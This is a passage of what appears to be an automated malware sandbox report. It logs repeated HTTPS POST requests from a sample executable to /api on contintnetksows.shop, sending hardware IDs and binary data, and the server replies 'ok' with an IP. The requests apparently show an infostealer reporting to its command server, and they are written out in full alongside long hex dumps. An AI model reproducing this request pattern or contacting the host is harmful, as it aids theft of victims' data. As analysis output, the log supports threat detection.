                CF-RAY: 89cc99e58cbe1977-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:53 UTC555INData Raw: 63 66 34 0d 0a 68 36 5a 38 2f 6b 51 33 41 49 7a 50 4a 42 57 70 77 41 30 44 55 63 32 69 5a 79 6c 46 68 4d 47 65 66 72 31 66 6c 62 36 43 48 6b 54 38 72 48 58 63 4d 68 55 36 72 50 73 49 48 36 44 69 66 6d 5a 7a 39 34 49 54 57 7a 44 68 37 5a 52 33 6e 7a 37 78 6e 4c 67 2b 49 75 62 4b 44 35 74 6f 50 51 6d 75 71 6c 77 33 6b 2b 42 57 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66 4f 76 2f 63 34 33 49 6d 35 73 30 54 6a 69 68 55 61 4f 43 6f 54 48 44 4b 70 47 78 76 50 4b 6a 48 41 6b 67 76 36 71 6a 7a 46 74 42 39 75 5a 36 67 65 7a 36 6c 6e 46 7a 63 43 56 4a 30 37 59 4a 46 5a 73 4c 69 4c 58 35 39 78 36 74 75 55 6d 57 6d 70 50 42 63 68 33 2b 33 33 2b 64 38 4b 4f 48 43 46 35 59 73 58 32 54 76 71 30 35 6c 77 4b 5a 6c 61 7a 4f 70 79 77 68 44 4e 65 69 6e 39 42 44 65 4d 50
                Data Ascii: cf4h6Z8/kQ3AIzPJBWpwA0DUc2iZylFhMGefr1flb6CHkT8rHXcMhU6rPsIH6DifmZz94ITWzDh7ZR3nz7xnLg+IubKD5toPQmuqlw3k+BWCVjE2UcLIOrjpF6fOv/c43Im5s0TjihUaOCoTHDKpGxvPKjHAkgv6qjzFtB9uZ6gez6lnFzcCVJ07YJFZsLiLX59x6tuUmWmpPBch3+33+d8KOHCF5YsX2Tvq05lwKZlazOpywhDNein9BDeMP
                2024-07-02 06:32:53 UTC1369INData Raw: 7a 6e 63 47 61 39 68 6c 36 59 4a 31 46 6a 36 71 4e 49 63 38 65 6b 59 57 77 38 71 63 6f 46 54 43 33 75 71 2f 30 52 31 44 4c 33 32 65 31 34 49 4f 6e 46 47 39 78 6f 46 79 4c 70 74 51 59 76 69 65 4a 42 5a 6a 43 39 67 6a 42 49 4b 65 69 6b 36 6c 79 64 49 72 6d 30 69 78 63 2f 70 34 51 5a 6b 47 59 4e 49 4b 36 6a 51 33 6a 5a 6f 33 31 6b 50 62 33 4d 41 45 30 71 35 61 33 38 47 64 67 77 2b 64 72 6e 66 79 37 68 78 52 43 51 4c 46 5a 6d 37 65 30 49 4e 59 75 6c 64 79 46 72 37 59 41 30 53 43 50 68 73 66 38 53 6e 33 2f 6f 6b 6f 67 58 54 66 79 47 58 70 73 71 46 54 71 73 37 55 78 78 78 71 74 6b 5a 6a 75 6a 30 67 35 45 4a 4f 2b 6b 2b 68 62 63 4e 66 33 61 37 6e 30 68 34 4d 4d 4d 6b 69 31 59 59 65 53 72 42 6a 6d 4a 34 6d 68 35 63 2f 65 43 52 57 55 6b 39 37 58 4f 48 38 34 73 74
                Data Ascii: zncGa9hl6YJ1Fj6qNIc8ekYWw8qcoFTC3uq/0R1DL32e14IOnFG9xoFyLptQYvieJBZjC9gjBIKeik6lydIrm0ixc/p4QZkGYNIK6jQ3jZo31kPb3MAE0q5a38Gdgw+drnfy7hxRCQLFZm7e0INYuldyFr7YA0SCPhsf8Sn3/okogXTfyGXpsqFTqs7UxxxqtkZjuj0g5EJO+k+hbcNf3a7n0h4MMMki1YYeSrBjmJ4mh5c/eCRWUk97XOH84st
                2024-07-02 06:32:53 UTC1369INData Raw: 72 36 6f 59 72 6e 79 68 62 5a 66 6a 74 42 47 69 46 79 67 51 4b 4b 75 32 41 41 6b 64 6e 76 75 47 38 45 4e 59 39 2f 4e 62 6b 66 43 48 6f 77 52 32 62 4a 56 68 6c 35 4b 4e 42 63 38 65 72 59 6d 63 7a 71 4d 51 41 57 53 4c 76 72 2f 42 63 6b 58 2b 33 32 2f 67 38 66 71 65 45 4d 5a 73 77 56 6b 33 74 76 45 38 33 69 62 30 68 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66 4f 76 4c 55 36 33 6f 75 35 64 59 62 6b 69 31 55 61 4f 69 73 53 33 76 4e 6f 6d 35 68 4e 61 50 41 41 6b 77 31 39 4b 62 36 44 74 56 39 75 5a 36 67 65 7a 36 6c 6e 46 7a 63 45 45 56 31 2f 37 73 45 51 73 69 73 59 57 59 6c 37 34 49 61 42 55 2b 4e 79 4f 56 65 6e 7a 72 37 6e 4c 67 2b 5a 75 37 45 45 70 73 75 55 32 62 6d 6f 6b 6c 2b 32 61 4e 6a 62 79 47 6f 77 41 78 46 4b 4f 71 71 38 52 76 53 4e 76 33 52 35 48
                Data Ascii: r6oYrnyhbZfjtBGiFygQKKu2AAkdnvuG8ENY9/NbkfCHowR2bJVhl5KNBc8erYmczqMQAWSLvr/BckX+32/g8fqeEMZswVk3tvE83ib0hCVjE2UcLIOrjpF6fOvLU63ou5dYbki1UaOisS3vNom5hNaPAAkw19Kb6DtV9uZ6gez6lnFzcEEV1/7sEQsisYWYl74IaBU+NyOVenzr7nLg+Zu7EEpsuU2bmokl+2aNjbyGowAxFKOqq8RvSNv3R5H
                2024-07-02 06:32:53 UTC30INData Raw: 44 4a 49 6f 58 47 2f 6f 70 55 46 35 78 71 6c 70 61 6a 53 6f 78 67 68 44 4b 75 4f 67 0d 0a
                Data Ascii: DJIoXG/opUF5xqlpajSoxghDKuOg
                2024-07-02 06:32:53 UTC1369INData Raw: 34 33 65 63 0d 0a 2f 52 6a 56 4c 2f 54 58 36 6e 45 73 70 59 70 63 33 43 46 4e 49 72 62 76 42 6c 44 48 69 33 39 36 49 62 6d 41 52 31 52 70 6a 73 69 58 42 5a 31 39 38 4e 43 67 4a 47 53 6c 78 78 47 56 4b 56 31 71 34 61 4a 43 65 63 32 6b 59 6d 51 38 70 64 49 4e 52 53 72 74 72 50 63 4f 33 7a 44 7a 30 4f 52 30 4c 65 2b 45 55 4e 35 6d 55 6e 71 75 39 51 51 33 2f 71 39 67 59 54 43 35 67 45 64 55 61 59 37 49 6c 77 57 64 66 66 44 51 6f 43 52 6b 70 63 67 51 6e 43 6c 5a 62 75 57 6c 52 33 76 46 70 57 70 6f 4f 36 66 53 42 45 38 76 35 36 33 7a 48 64 73 34 38 74 6a 6e 65 43 44 71 68 46 44 65 5a 6c 4a 36 72 76 55 45 4e 2b 53 46 57 69 4d 53 6c 59 42 48 56 47 6d 4f 79 4a 63 46 6e 58 33 77 30 4b 41 6b 5a 4b 58 49 48 5a 41 75 57 6d 54 6e 6f 55 78 2b 77 4b 35 6b 5a 54 2b 6d 78
                Data Ascii: 43ec/RjVL/TX6nEspYpc3CFNIrbvBlDHi396IbmAR1RpjsiXBZ198NCgJGSlxxGVKV1q4aJCec2kYmQ8pdINRSrtrPcO3zDz0OR0Le+EUN5mUnqu9QQ3/q9gYTC5gEdUaY7IlwWdffDQoCRkpcgQnClZbuWlR3vFpWpoO6fSBE8v563zHds48tjneCDqhFDeZlJ6rvUEN+SFWiMSlYBHVGmOyJcFnX3w0KAkZKXIHZAuWmTnoUx+wK5kZT+mx
                2024-07-02 06:32:53 UTC1369INData Raw: 73 70 50 51 57 30 54 44 78 32 4f 5a 36 5a 71 75 47 58 70 73 2b 46 54 71 73 37 58 52 36 78 61 74 73 5a 7a 36 35 36 44 51 4c 5a 66 6e 74 6c 48 65 30 4a 4c 57 63 35 33 42 6d 76 59 5a 65 6d 43 31 64 62 75 75 6c 51 33 62 44 71 47 64 75 50 4c 33 42 43 6b 49 67 37 61 37 7a 45 74 6f 7a 35 64 76 72 64 79 37 73 79 68 6a 63 61 42 63 69 36 62 55 47 4c 34 6e 69 57 57 49 39 70 4e 45 4b 53 43 75 6d 34 65 4e 53 74 31 61 63 78 61 49 38 49 65 6d 45 52 74 35 6d 58 32 6e 71 72 6b 4a 79 78 4b 4e 75 5a 79 47 6f 79 52 64 46 4b 75 6d 72 39 42 58 65 4f 66 4c 52 35 6e 41 73 35 4d 4d 51 6b 69 34 56 4c 4b 7a 74 51 57 2b 4c 2b 69 30 68 45 72 2f 62 46 31 30 71 78 36 37 7a 58 4a 30 69 75 62 53 4c 46 7a 2b 6e 68 42 6d 51 5a 67 30 67 72 71 52 55 63 38 61 77 5a 6d 59 39 6f 4d 4d 58 53 69
                Data Ascii: spPQW0TDx2OZ6ZquGXps+FTqs7XR6xatsZz656DQLZfntlHe0JLWc53BmvYZemC1dbuulQ3bDqGduPL3BCkIg7a7zEtoz5dvrdy7syhjcaBci6bUGL4niWWI9pNEKSCum4eNSt1acxaI8IemERt5mX2nqrkJyxKNuZyGoyRdFKumr9BXeOfLR5nAs5MMQki4VLKztQW+L+i0hEr/bF10qx67zXJ0iubSLFz+nhBmQZg0grqRUc8awZmY9oMMXSi
                2024-07-02 06:32:53 UTC1369INData Raw: 46 39 59 79 39 74 50 67 66 79 66 76 7a 41 79 61 4a 6c 35 71 36 61 56 43 65 64 6d 6a 59 43 46 39 37 59 41 43 55 32 65 2b 34 62 77 74 79 54 72 77 30 36 4a 56 49 66 37 46 46 4a 38 74 57 53 4b 73 73 67 67 66 6f 4d 6c 32 49 33 4f 6f 7a 45 55 54 5a 61 61 75 38 42 48 62 4c 2f 76 63 34 48 55 68 37 39 59 52 6b 79 74 57 59 75 75 2f 52 32 58 45 71 57 70 69 4e 36 44 50 43 55 4d 74 70 75 32 2b 58 4e 67 6c 74 34 53 69 50 41 72 6d 31 52 54 65 41 55 39 30 36 61 46 58 66 4d 61 75 4c 79 4d 73 34 61 68 75 49 44 36 6b 34 2f 73 51 6e 32 57 31 6e 4f 42 39 4b 2f 66 42 48 35 59 73 57 47 72 68 71 45 4e 34 7a 36 5a 6b 62 79 47 68 7a 77 56 4e 4c 4f 65 6d 2f 78 66 56 4d 2f 37 4f 6f 44 4a 6b 70 63 4d 47 33 48 34 58 49 73 53 32 52 33 72 48 34 45 46 71 4a 61 69 43 4a 45 55 73 34 61 2f
                Data Ascii: F9Yy9tPgfyfvzAyaJl5q6aVCedmjYCF97YACU2e+4bwtyTrw06JVIf7FFJ8tWSKssggfoMl2I3OozEUTZaau8BHbL/vc4HUh79YRkytWYuu/R2XEqWpiN6DPCUMtpu2+XNglt4SiPArm1RTeAU906aFXfMauLyMs4ahuID6k4/sQn2W1nOB9K/fBH5YsWGrhqEN4z6ZkbyGhzwVNLOem/xfVM/7OoDJkpcMG3H4XIsS2R3rH4EFqJaiCJEUs4a/
                2024-07-02 06:32:53 UTC1369INData Raw: 62 65 53 6f 6a 77 68 2f 59 52 47 33 6d 5a 77 51 66 6d 37 54 44 58 6f 74 58 6c 72 4e 4b 50 57 44 6b 6f 6b 38 4b 37 73 58 4a 30 69 75 62 53 4c 46 7a 2b 6e 68 42 6d 51 5a 67 30 67 72 71 5a 4a 65 63 61 70 61 32 67 32 70 38 4d 41 54 69 33 71 72 2f 30 55 31 6a 66 79 32 65 5a 32 4a 65 76 4c 48 35 41 69 58 47 7a 6e 37 51 67 31 69 36 56 33 49 57 76 74 67 44 4e 62 49 50 36 75 37 46 37 74 50 75 62 4e 39 58 45 32 34 34 59 78 6e 79 70 57 5a 2b 6d 39 42 6a 58 55 37 41 63 4b 57 4c 61 43 52 55 77 72 70 76 75 2b 58 4e 38 35 2b 39 2f 6e 63 69 6e 6f 79 78 6d 58 4b 56 39 73 2f 4b 4a 44 66 38 65 71 59 6e 4d 35 70 64 49 4d 51 69 72 6f 71 2b 34 66 6e 33 4f 31 6e 4f 64 6b 5a 72 32 47 58 71 34 73 56 6d 37 34 6f 45 6b 33 69 62 30 68 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66
                Data Ascii: beSojwh/YRG3mZwQfm7TDXotXlrNKPWDkok8K7sXJ0iubSLFz+nhBmQZg0grqZJecapa2g2p8MATi3qr/0U1jfy2eZ2JevLH5AiXGzn7Qg1i6V3IWvtgDNbIP6u7F7tPubN9XE244YxnypWZ+m9BjXU7AcKWLaCRUwrpvu+XN85+9/ncinoyxmXKV9s/KJDf8eqYnM5pdIMQiroq+4fn3O1nOdkZr2GXq4sVm74oEk3ib0hCVjE2UcLIOrjpF6f
                2024-07-02 06:32:53 UTC1369INData Raw: 73 58 54 61 58 43 58 73 52 6b 42 53 79 47 78 69 30 63 69 36 5a 2b 49 57 76 74 6b 46 63 51 63 72 58 30 72 45 36 33 56 70 7a 44 72 68 52 4e 6a 74 31 32 39 30 30 2b 49 76 6a 74 48 6a 57 5a 37 41 63 4b 57 4d 53 41 46 77 74 2f 70 4f 4f 37 48 38 30 76 38 64 2f 32 66 32 48 62 2b 6a 32 4c 4d 46 39 35 72 49 74 42 5a 73 4b 30 59 6e 4d 4e 6b 65 34 49 53 69 54 6f 34 63 30 4b 30 69 33 30 32 65 64 43 47 4f 76 44 43 70 73 6f 55 32 4b 75 34 79 34 63 6f 4d 6b 76 62 6e 50 33 67 6a 77 4c 62 36 61 63 73 6e 53 30 56 70 79 63 2b 44 78 2b 70 34 51 72 6e 79 68 62 5a 66 69 38 43 31 54 63 74 47 56 36 63 59 6e 48 46 45 49 78 36 37 47 38 55 72 64 57 6e 4c 65 67 65 6d 61 39 68 6b 37 53 54 6a 34 4a 68 65 31 43 5a 6f 76 36 4c 54 46 68 39 4a 56 57 48 48 65 30 79 35 64 33 77 48 4f 66 74
                Data Ascii: sXTaXCXsRkBSyGxi0ci6Z+IWvtkFcQcrX0rE63VpzDrhRNjt12900+IvjtHjWZ7AcKWMSAFwt/pOO7H80v8d/2f2Hb+j2LMF95rItBZsK0YnMNke4ISiTo4c0K0i302edCGOvDCpsoU2Ku4y4coMkvbnP3gjwLb6acsnS0Vpyc+Dx+p4QrnyhbZfi8C1TctGV6cYnHFEIx67G8UrdWnLegema9hk7STj4Jhe1CZov6LTFh9JVWHHe0y5d3wHOft


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.549709172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:55 UTC286OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 12830
                Host: contintnetksows.shop
                2024-07-02 06:32:55 UTC12830OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:55 UTC806INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:55 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=k37g56cjqn12ktfg33vnbkc64g; expires=Sat, 26-Oct-2024 00:19:34 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EFjnGwKSCoJVafhpCjRDTGyRhwil6e5b6mF%2FsQRuQeHdF5z0rE0cP1K6Z4Zyt83VbKXn256AMsJoyxeHJ545zfESEwMmpq5UHqRYwewk84UVdm0q11hI%2Bnur29Cfzm83pkZJ587kwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99f02a334332-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:55 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:55 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.549710172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:56 UTC286OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 15072
                Host: contintnetksows.shop
                2024-07-02 06:32:56 UTC15072OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:56 UTC806INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=5182n68igjkkj9d5ht3hg9eklr; expires=Sat, 26-Oct-2024 00:19:35 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7E9VV656QlWMJxy3Nm1kBsNxlLKjrJrW33MJws0VmAQWKrwFo3uazIikPzkxcFl8ywy33k1dsVg1HHcbm0My7ytHMIAubgYFmoMSXHPNDFKLzhom91tc6mztujWS%2B%2Ft32aZwglFSOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99f88f270f4d-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:56 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:56 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.549711172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:57 UTC286OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20562
                Host: contintnetksows.shop
                2024-07-02 06:32:57 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:57 UTC5231OUTData Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14
                Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
                2024-07-02 06:32:57 UTC810INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:57 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=pfge8itkvb6jmnagheh9ht3514; expires=Sat, 26-Oct-2024 00:19:36 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAWMpSV6AUQGomw5hIpFiI41kxdVaJqzwStFFAofcE8Oa2QrdWoef6RrA3pp9OgNplD21xKELAZKedU5xb1VKd8Lj%2BwRM694OahG43eOr%2FqBFz3Ctp7UOyfdRimWvrEXsA6Kt%2BU1EA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99ff4a60428b-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:57 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:57 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.549712172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:59 UTC285OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 7081
                Host: contintnetksows.shop
                2024-07-02 06:32:59 UTC7081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:59 UTC806INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:59 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=mfn8d3pe9dq1q3q0par5bgumhf; expires=Sat, 26-Oct-2024 00:19:38 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLeuoUt8wf0dRHmtOisd3HuGwrasq6oZ4O7SFK%2FjZNOqnsbrAM7cACQl6JakqjhIgL%2F5AENnEimVkl2scwOLY04LLxmA8qw5v1aBWzAYcmxJVKhAWnNeGGS7md5qBYpPDPxYAKHosA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a097cff435e-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:59 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:59 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.549714172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:33:00 UTC285OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1261
                Host: contintnetksows.shop
